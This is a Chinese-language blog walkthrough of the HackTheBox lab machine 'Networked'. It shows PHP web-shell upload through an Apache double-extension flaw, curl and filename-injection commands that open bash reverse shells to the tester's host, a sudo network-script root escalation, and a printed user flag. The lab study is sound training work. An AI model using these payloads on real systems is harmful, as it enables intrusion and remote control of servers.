freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件解析漏洞+定时任务命令注入+CentOS网络配置权限提升命令注入
maptnh 2024-08-03 01:03:20 42876

信息收集

IP AddressOpening Ports
10.10.10.146TCP:22,80

$ nmap -p- 10.10.10.146 --min-rate 1000 -sC -sV

PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
|   256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_  256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp  open   http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

HTTP

http://10.10.10.146/

image.png

$ gobuster dir -u "http://10.10.10.146/" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x html,txt,php -b 404,403 -t 50

image-1.png

$ wget http://10.10.10.146/backup/backup.tar;tar xvf backup.tar

image-2.png

image-3.png

$ cat lib.php

image-4.png

Apache 2.4.x存在向上解析漏洞

image-5.png

$ echo '89 50 4E 47 0D 0A 1A 0A' | xxd -p -r >shell.php.png

$ echo '<?php system($_GET[1]);?>'>>shell.php.png

image-6.png

http://10.10.10.146/photos.php

image-7.png

http://10.10.10.146/uploads/10_10_16_14.php.png?1=dir

image-8.png

$ curl 'http://10.10.10.146/uploads/10_10_16_14.php.png?1=%2fbin%2fbash+-c+%27bash+-i+%3e%26+%2fdev%2ftcp%2f10.10.16.14%2f10032+0%3e%261%27'

image-9.png

定时任务命令注入

image-10.png

image-11.png

exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");

这段脚本列出 /uploads 文件夹中的文件,并根据文件名检查其有效性。任何无效的文件都通过 system exec() 函数被删除。

$value 变量存储了文件名,但脚本没有对其进行清理,这意味着我们可以通过特殊的文件名注入命令。例如,一个名为 "; cmd 的文件会导致以下命令被执行:

nohup /bin/rm -f $path;cmd > /dev/null 2>&1 &

$ cd /var/www/html/uploads; reverse=$(echo -n 'bash -c "bash -i >/dev/tcp/10.10.16.14/10034 0>&1"' | base64); touch -- "; echo $reverse | base64 -d | bash"

image-12.png

User.txt

6b914b0701e297b83c7e6d052dc37247

权限提升

[guly@networked /]$ sudo -l

[guly@networked /]$ cat /usr/local/sbin/changename.sh

image-13.png

脚本为 guly0 网络接口创建配置,并在最后使用 ifup guly0 来激活它。用户输入经过验证,只允许字母数字字符、斜杠或破折号。CentOS 上的网络配置脚本对命令注入存在漏洞,因为这些脚本会被底层服务引用,导致任何在空格后的内容都会被执行。我们可以利用这个漏洞通过执行 /bin/bash 作为 root 用户。

sudo /usr/local/sbin/changename.sh

x /bin/bash
x
x
x

image-14.png

Root.txt

# web安全
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 maptnh 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
HackTheBox
maptnh LV.9
Ценность жизни выше, чем кража данных.
  • 342 文章数
  • 63 关注者
[CISSP] [7] PKI和密码应用
2025-04-03
[CISSP] [6] 密码学和对称密钥算法
2025-04-03
[CISSP] [5] 保护资产安全
2025-04-02
文章目录